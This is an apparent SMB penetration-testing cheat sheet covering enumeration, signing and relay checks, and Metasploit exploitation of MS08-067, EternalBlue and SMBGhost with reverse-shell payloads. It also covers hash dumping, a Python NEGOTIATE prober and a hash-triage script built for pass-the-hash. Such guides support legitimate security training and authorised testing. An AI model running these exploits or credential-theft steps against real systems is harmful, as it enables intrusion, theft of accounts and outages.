SMB (Server Message Block)
Default Port: 139, 445
SMB (Server Message Block) is a network protocol for file sharing, network browsing, printing and inter-process communication (named pipes) over a network. CIFS (Common Internet File System) is the name of the old SMB 1.0 dialect; the two terms are often used interchangeably, but modern hosts speak SMB 2.x/3.x and SMB1 is disabled by default on current Windows releases. Port 445 carries SMB directly over TCP; port 139 carries it inside the NetBIOS session service.
Connect
Start by connecting to the SMB server. To list the shares it exposes without credentials (a null session; -N suppresses the password prompt):
smbclient -L //target-ip -N
To open a share with credentials:
smbclient //target-ip/share -U username
Recon
Network Scanning for SMB Services
Identify hosts running SMB within the target network. Scan both ports: some hosts only expose NetBIOS-over-TCP on 139.
# Nmap to discover SMB services
nmap -p 139,445 --open -sV <target-ip>
Identify SMB Version
Determine which SMB dialects the target accepts. An SMBv1 entry in the output is the precondition for MS17-010 and other SMBv1-only attacks; a 3.x-only host rules them out.
# Nmap script for SMB version
nmap --script smb-protocols -p 445 <target-ip>
Enumeration
For further enumeration, various tools such as enum4linux, smbmap, or the nmap scripting engine can be employed.
smbclient
Using smbclient to list shares over a null session (no password prompt):
smbclient -L //192.168.1.100 -N
enum4linux
Using enum4linux for enumeration
enum4linux -a target-ip
smbmap
smbmap -H target-ip
nmap
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse target-ip
This runs two scripts that enumerate shares and users on the target. Both work over a null session when the server permits one; otherwise pass credentials with --script-args smbusername=<user>,smbpassword=<pass>.
Attack Vectors
This section covers the attack vectors most often encountered against SMB.
SMB Null Session
A null session is an unauthenticated connection to the SMB server (empty username and password) over TCP 445 or 139. Where it is allowed it gives away users, groups, shares and password-policy details. Modern Windows restricts anonymous access by default, but older hosts, misconfigured domain controllers and Samba servers still frequently permit it.
Command to establish a null session with rpcclient (-N skips the password prompt; then try enumdomusers, enumdomgroups, querydominfo):
rpcclient -U "" -N <target-ip>
SMB Signing
SMB signing protects each message with a session-keyed MAC. What matters to an attacker is whether the server requires it: when signing is merely enabled (the default on Windows workstations and member servers; only domain controllers require it by default), NTLM authentication captured from another host can be relayed to this server (for example with Impacket's ntlmrelayx) and the unsigned session accepted. Hosts that do not require signing are therefore the target list for relay attacks.
To check the signing status (the smb2-security-mode script reports the same for SMB2/3):
nmap --script smb-security-mode.nse -p445 <target-ip>
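What the smb-security-mode script reports comes from the SecurityMode field of the server's SMB2 NEGOTIATE response, and the dialect shown by smb-protocols comes from the same reply. The following Python script, an added example that is not part of this page or of any tool listed on it, performs that exchange by hand: it builds a NEGOTIATE request per MS-SMB2, parses the response, and reports dialect, signing flags and encryption capability. The `sample_response` builder is a constructed reply for offline use, not a real capture; `probe` does the live exchange against a host you name.

```python
import socket
import struct
import uuid

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SIGNING_ENABLED = 0x0001      # SMB2_NEGOTIATE_SIGNING_ENABLED
SIGNING_REQUIRED = 0x0002     # SMB2_NEGOTIATE_SIGNING_REQUIRED
CAP_ENCRYPTION = 0x00000040   # SMB2_GLOBAL_CAP_ENCRYPTION
# Offer dialects up to 3.0.2 only: offering 3.1.1 would require negotiate contexts
DIALECTS = [0x0202, 0x0210, 0x0300, 0x0302]
DIALECT_NAMES = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0",
                 0x0302: "3.0.2", 0x0311: "3.1.1"}

HEADER_FMT = "<4sHHIHHIIQIIQ16s"   # the fixed 64-byte SMB2 header


def smb2_header(command, flags=0, credits=0):
    """ProtocolId, StructureSize, CreditCharge, Status, Command, Credits, Flags,
    NextCommand, MessageId, Reserved, TreeId, SessionId, Signature."""
    return struct.pack(HEADER_FMT, SMB2_MAGIC, 64, 0, 0, command, credits,
                       flags, 0, 0, 0, 0, 0, b"\x00" * 16)


def build_negotiate_request(client_signing=SIGNING_ENABLED):
    """SMB2 NEGOTIATE request, wrapped in the 4-byte NetBIOS session header used on TCP/445."""
    body = struct.pack("<HHHHI16sQ", 36, len(DIALECTS), client_signing, 0, 0,
                       uuid.uuid4().bytes, 0)      # trailing 8 bytes: ClientStartTime
    body += b"".join(struct.pack("<H", d) for d in DIALECTS)
    msg = smb2_header(SMB2_NEGOTIATE) + body
    return struct.pack(">I", len(msg)) + msg       # type byte 0x00 + 3-byte big-endian length


def parse_negotiate_response(data):
    """Extract dialect, signing flags and encryption capability from a NEGOTIATE response."""
    if len(data) < 128 or data[:4] != SMB2_MAGIC:
        # An SMB1-only server does not answer an SMB2 header with an SMB2 reply
        raise ValueError("not an SMB2 reply: SMB1-only server, or not SMB at all")
    status, command = struct.unpack_from("<IH", data, 8)
    if command != SMB2_NEGOTIATE or status != 0:
        raise ValueError(f"unexpected reply: command={command:#x} status={status:#x}")
    size, mode, dialect, _ctx, guid, caps = struct.unpack_from("<HHHH16sI", data, 64)
    if size != 65:
        raise ValueError(f"bad NEGOTIATE response StructureSize {size}")
    return {
        "dialect": DIALECT_NAMES.get(dialect, f"{dialect:#06x}"),
        "signing_enabled": bool(mode & SIGNING_ENABLED),
        "signing_required": bool(mode & SIGNING_REQUIRED),
        "encryption_capable": bool(caps & CAP_ENCRYPTION),
        "server_guid": str(uuid.UUID(bytes_le=guid)),
    }


def relay_risk(info):
    """Signing that is not required is exactly what an NTLM relay to this host needs."""
    return "relayable" if not info["signing_required"] else "signing required"


def probe(host, port=445, timeout=5.0):
    """Live check: send one NEGOTIATE and parse the answer (not used by the offline test)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_negotiate_request())
        length = int.from_bytes(s.recv(4)[1:], "big")
        data = b""
        while len(data) < length:
            chunk = s.recv(length - len(data))
            if not chunk:
                break
            data += chunk
    return parse_negotiate_response(data)


def sample_response(mode=SIGNING_ENABLED, dialect=0x0302, caps=0x2F):
    """Constructed NEGOTIATE response for offline testing; not a real capture."""
    header = smb2_header(SMB2_NEGOTIATE, flags=SMB2_FLAGS_SERVER_TO_REDIR, credits=1)
    # StructureSize, SecurityMode, DialectRevision, NegotiateContextCount, ServerGuid,
    # Capabilities, MaxTransact/Read/Write, SystemTime, ServerStartTime,
    # SecurityBufferOffset/Length, NegotiateContextOffset
    body = struct.pack("<HHHH16sIIIIQQHHI", 65, mode, dialect, 0, b"\x11" * 16,
                       caps, 8 << 20, 8 << 20, 8 << 20, 0, 0, 128, 0, 0)
    return header + body


if __name__ == "__main__":
    import sys
    result = probe(sys.argv[1])
    print(result, relay_risk(result))
```

Run it as `python3 smbneg.py <target-ip>`; a Windows member server in its default configuration answers with signing enabled but not required, which is the "relayable" case. The script stops at NEGOTIATE, so it never authenticates and leaves no logon event on the target.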
MS08-067 (Netapi)
A stack overflow in the Server service's path canonicalisation code (netapi32), reachable through an unauthenticated RPC call over SMB. It affects Windows 2000, XP and Server 2003; Vista and Server 2008 are only exploitable with credentials. These are 32-bit targets, so the payload must be an x86 one.
Metasploit module for exploitation:
use exploit/windows/smb/ms08_067_netapi
set RHOSTS <TARGET-IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
exploit
MS17-010 (EternalBlue)
A buffer overflow in the SMBv1 server (srv.sys) that allows unauthenticated remote code execution via a crafted SMBv1 transaction. Confirm the host is vulnerable first, with nmap's smb-vuln-ms17-010 script or Metasploit's auxiliary/scanner/smb/smb_ms17_010 scanner, because the exploit corrupts kernel pool memory and can crash the target. The exploit returns a SYSTEM shell.
Metasploit module for exploitation:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <TARGET-IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
exploit
SMBGhost (CVE-2020-0796)
An integer overflow in the SMBv3.1.1 compression handling of srv2.sys, affecting Windows 10 and Server versions 1903 and 1909. The remote exploit is unreliable and frequently blue-screens the target; the module below is for lab use, not for a production engagement without explicit agreement.
use exploit/windows/smb/cve_2020_0796_smbghost
set RHOSTS <TARGET-IP>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
exploit
Post-Exploitation
Once a session is obtained, move on to privilege escalation, credential harvesting and lateral movement.
Gaining System Access
From a Meterpreter session, getsystem attempts to escalate to NT AUTHORITY\SYSTEM using its built-in techniques. The MS08-067 and MS17-010 exploits above already land as SYSTEM, so this step is only needed when the session arrived with lower privileges (check with getuid).
getsystem
Dumping Hashes
With a SYSTEM (or local administrator) session, the smart_hashdump post module pulls local account hashes from the SAM (and domain hashes from NTDS.dit when run on a domain controller). The Meterpreter hashdump command is the quicker alternative for local hashes only. Hashes come out in pwdump format (user:rid:lm:nt:::), directly usable for pass-the-hash.
use post/windows/gather/smart_hashdump
set SESSION <session-id>
run
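Before any cracking, the dump is worth a quick triage: blank passwords, LM hashes that should not exist on a modern host, and one hash shared by several accounts all change the next step. The following Python script is an added example, not part of this page or of Metasploit; the sample dump it carries is constructed (the jdoe line holds the well-known LM/NT hashes of the string "password", the other non-empty NT hash is an arbitrary placeholder).

```python
import re
from collections import defaultdict

# Hashes of the empty password (well-known constants, not sample data)
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One account per line, as printed by smart_hashdump / meterpreter hashdump
PWDUMP_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Constructed sample dump for offline use; not a real capture.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
jdoe:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[*] status line that the parser must ignore
"""


def parse_pwdump(text):
    """Return a list of {user, rid, lm, nt} dicts; lines that are not hash records are skipped."""
    entries = []
    for line in text.splitlines():
        m = PWDUMP_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["rid"] = int(d["rid"])
        d["lm"] = d["lm"].lower()
        d["nt"] = d["nt"].lower()
        entries.append(d)
    return entries


def triage(entries):
    """Flag the findings that decide the next move before any cracking starts."""
    by_nt = defaultdict(list)
    for e in entries:
        by_nt[e["nt"]].append(e["user"])
    return {
        # NT hash of "": the account has no password at all
        "blank_password": [e["user"] for e in entries if e["nt"] == EMPTY_NT],
        # A real LM hash means LM storage is still enabled; LM cracks in minutes
        "lm_hash_present": [e["user"] for e in entries if e["lm"] != EMPTY_LM],
        # Several accounts with one NT hash share one password
        "shared_nt_hash": [users for users in by_nt.values() if len(users) > 1],
        # RID 500 is the built-in Administrator, whatever it has been renamed to
        "builtin_admin": [e["user"] for e in entries if e["rid"] == 500],
    }


def pth_hashes(entry):
    """LM:NT string in the form Impacket tools accept for their -hashes option."""
    return f"{entry['lm']}:{entry['nt']}"


if __name__ == "__main__":
    import sys
    dump = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_DUMP
    parsed = parse_pwdump(dump)
    for key, value in triage(parsed).items():
        print(f"{key}: {value}")
    for e in parsed:
        print(f"{e['user']}: -hashes {pth_hashes(e)}")
```

Feed it the file you saved the module output to (`python3 triage.py hashes.txt`); with no argument it runs on the embedded sample. The LM:NT strings it prints go straight into Impacket's `-hashes` option for pass-the-hash against other hosts whose local Administrator shares the same hash.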
Common SMB Commands
Command | Description | Usage |
---|---|---|
smbclient | Connect to an SMB/CIFS server | smbclient //server/share |
smbget | Download files from an SMB/CIFS server | smbget smb://server/share/file |
smbpasswd | Change a user's SMB password | smbpasswd -r server -U username |
smbstatus | Display information about SMB connections | smbstatus |
smbtree | List SMB/CIFS shares on a network | smbtree |
mount -t cifs | Mount an SMB/CIFS share | mount -t cifs //server/share /mnt/point |
umount | Unmount an SMB/CIFS share | umount /mnt/point |